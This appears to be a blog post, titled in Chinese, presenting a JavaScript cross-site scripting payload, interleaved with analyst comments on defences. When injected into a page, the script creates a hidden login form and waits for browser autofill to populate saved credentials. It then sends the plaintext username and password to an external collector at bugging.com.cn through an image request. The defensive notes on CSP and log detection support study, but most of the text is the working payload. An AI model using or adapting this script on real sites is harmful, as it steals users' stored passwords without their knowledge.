xss获取明文历史表单

[cc lang=”javascript”]
/**
 * Writes a string into the current document with document.write().
 *
 * NOTE(review): the string argument is empty in this listing and the quote
 * characters are typographic, so the original markup was probably lost when
 * the blog rendered the post. Confirm against a raw copy before analysis.
 * Nothing in the visible listing calls this function.
 */
function create_body(){
document.write(‘‘);
}
/**
 * Analyst summary: builds an invisible two-field form, waits 2.5 seconds,
 * then reads both field values and sends them to a hard-coded third-party
 * URL by assigning it to an Image's src.
 *
 * The {set.*} and {projectId} tokens look like template placeholders filled
 * in by the platform that serves this script (not confirmed from this page).
 * Going by the post title and the original comment, the delay presumably
 * gives the browser's saved-login autofill time to populate the fields.
 *
 * Defensive notes:
 *  - The root cause is the script-injection flaw that lets this run in the
 *    page's origin; output encoding and a Content-Security-Policy that
 *    disallows inline/third-party script address that.
 *  - A restrictive CSP img-src/default-src would block the Image request
 *    used as the outbound channel.
 *  - In proxy or web logs, look for GET requests to external hosts that
 *    carry username= and password= query parameters.
 *
 * @param user Not referenced anywhere in the body.
 */
function create_form(user) { /* obtain the plaintext password */
// Hidden container: display is set to none so the form is not visible.
var f = document.createElement(“form”);
f.style.display= “none”
document.getElementsByTagName(“body”)[0].appendChild(f);
// First input; type, name and id come from placeholders. It is read back
// below as the username.
var e1 = document.createElement(“input”);
e1.type = “{set.type1}”;
e1.name = “{set.name1}”;
e1.id = “{set.id1}”;
f.appendChild(e1);
// Second input, configured the same way; read back below as the password.
var e = document.createElement(“input”);
e.name = “{set.name2}”;
e.type = “{set.type2}”;
e.id = “{set.id2}”;
f.appendChild(e);

// Deferred read, 2500 ms after the fields are inserted.
setTimeout(function () {
// Both names are assigned without var/let/const, so they become globals on
// the page and can serve as an artifact during live triage.
username = document.getElementById(“{set.id1}”).value;
password = document.getElementById(“{set.id2}”).value;
if(username==null||username==””)
{
// Nothing is sent when the first field is still empty.

}
else
{
// Image-src beacon: the values are concatenated into the query string
// without URL-encoding and sent over plain http, so they also appear in
// clear text to any on-path observer and in proxy/server logs.
var newimg = new Image();
newimg.src=”http://bugging.com.cn/index.php?do=api&id={projectId}&username=”+username+”&password=”+password;
}
}, 2500); // timing race
}

// Runs as soon as the injected script is evaluated; create_form never reads
// its argument, so the value passed here has no effect.
create_form(”);
[/cc]
